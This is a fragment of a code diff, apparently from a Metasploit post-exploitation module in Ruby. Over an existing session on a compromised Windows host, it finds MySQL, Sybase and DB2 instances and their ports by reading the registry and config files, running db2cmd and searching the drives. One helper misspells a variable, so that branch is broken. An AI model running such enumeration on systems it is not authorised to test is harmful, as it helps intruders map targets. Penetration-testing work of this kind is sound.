+				results << ["mysql","instance:MYSQL port:#{port}","MySQL Server",port]
+			else
+				print_error("\t\t! could not identify information")
+			end
+		end
+		return results
+	rescue
+		print_error("\t\t! could not identify information")
+		return results || []
+	end
+
+	# method to identify sybase instances
+	def enumerate_sybase
+		basekey = "HKLM\\SOFTWARE\\Sybase\\SQLServer"
+		instance = registry_getvaldata(basekey,"DSLISTEN")
+		location = registry_getvaldata(basekey,"RootDir")
+		results = []
+
+		if not exist?(location + "\\ini\\sql.ini")
+			print_error("\t\t! could not locate configuration file.")
+			return results
+		end
+
+		data = read_file(location + "\\ini\\sql.ini")
+		if data =~ /\[#{instance}\]([^\[]*)/
+			segment = $1
+		else
+			print_error("\t\t! couldnt locate information.")
+			return results
+		end
+
+		if segment =~ /master\=\w+\,[^\,]+\,(\d+)/
+			port = $1
+		else
+			print_error("\t\t! couldnt locate information.")
+			return results
+		end
+
+		print_good("\t\t+ #{instance} (Port:#{port})")
+		results << [ "sybase","instance:#{instance} port:#{port}","Sybase SQL Server",port ]
+		return results
+	rescue
+		print_error("\t\t! couldnt locate information.")
+		return results || []
+	end
+
+	# method to identify db2 instances
+	def enumerate_db2
+		results = []
+		cmd_i = cmd_exec("db2cmd", "-i -w /c db2ilist")
+		cmd_p = cmd_exec("db2cmd", "-i -w /c db2 get dbm cfg")
+		if cmd_p =~ /\ ?TCP\/IP\ Service\ name[\ ]+\(SVCENAME\)\ =\ (\w+)/
+			port = $1
+		else
+			print_error("\t\t! could not identify instances information")
+			return results
+		end
+
+		windir = session.fs.file.expand_path("%windir%")
+		getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
+
+		data = nil
+		getfile.each do |file|
+			if exist?("#{file['path']}\\#{file['name']}")
+				data = read_file("#{file['path']}\\#{file['name']}")
+				break if not data.nil?
+			end
+		end
+
+		if data and data =~ /#{port}[\ \t]+(\d+)/
+			port_t = $1
+		else
+			print_error("\t\t! could not identify instances information")
+			return results
+		end
+
+		cmd_i.split("\n").compact.each do |line|
+			stripped=line.strip
+			print_good("\t\t+ #{stripped} (Port:#{port_t})")
+			results << [ "db2","instance:#{stripped} port:#{port_t}","DB2 Server",port_t ]
+		end
+
+		return results
+
+	rescue
+		print_error("\t\t! could not identify instances information")
+		return results || []
+	end
+
+	##### helper methods #####
+
+	def find_mysql_conf(val_location)
+		data = nil
+		if exist?(val_location + "\\my.ini")
+			data = read_file(val_Location + "\\my.ini")
+		elsif exist?(val_location + "\\my.cnf")
+			data = read_file(val_location + "\\my.cnf")
+		else
+			sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
+			getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
+			getfile.each do |file|
+				if exist?("#{file['path']}\\#{file['name']}")
+					data = read_file("#{file['path']}\\#{file['name']}")
+					break
+				end
+			end
+		end
+		return data
+	end
+
+end